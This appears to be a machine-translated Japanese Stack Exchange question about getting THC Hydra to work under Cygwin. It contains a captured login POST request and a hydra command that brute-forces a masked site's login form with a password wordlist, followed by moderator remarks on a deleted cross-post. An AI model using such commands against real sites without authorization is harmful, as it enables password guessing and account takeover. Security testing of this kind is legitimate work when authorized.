まとめた THCヒドラ CygWinで使用 げっぷ (Windows 7を実行している)。私はいくつかのチュートリアルを読みましたが、Hydraにそのことをさせることはできません。
以下は、私がBurpから得た情報(私はいくつかの情報をxかyに置き換えたもの)と、一番下のコマンドラインです。私がヒットした後残念ながら 入る hydraは単に基本的な構文情報を返します。
BURP OUTPUT:
POST /login.php?action=in HTTP/1.1 Host: xxxxxx.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: nl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate, br Referer: https://xxxxxx.com/login.php Cookie: visidincap526178=dBiizl5bQzKldS2WdMrM/ArT6VYAAAAAQUIPAAAAAAB6g3H+O0+VIC6UaHfrwDzi; visidincap821436=nmDb/MkQTXm2VsdHkiWxuzYCN1cAAAAAQUIPAA AAAADrVUYTxunztOfbWaA78Xgm; _ga=GA1.2.242869812.1465591208 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 82formsent=1&redirecturl=index.php&req_username=blop&req_password=blop&login=Login
これは失敗した場合に生成されます。
間違ったユーザー名やパスワード。
これは私のコマンドラインです:
hydra -l yyyyy -P cygwin64/john.txt 123.456.789.012 https-post-form "/login.php:req_username=^USER^&req_password=^PASS^&login=Login:Wrong username and/or password." -V
セキュリティ上の投稿は閉じられ削除されました。
—
Rory Alsop
@RoryAlsop:わかりません、あなたは私をこのサイトに紹介しましたか?
—
scalle
はい。そして私はクロスポストを削除しました。
—
Rory Alsop
ああ、、私は、スタック交換中の1つを意味します。
—
scalle
いいえ - これはすべてスタック交換です。 Security Stack Exchangeから削除しました
—
Rory Alsop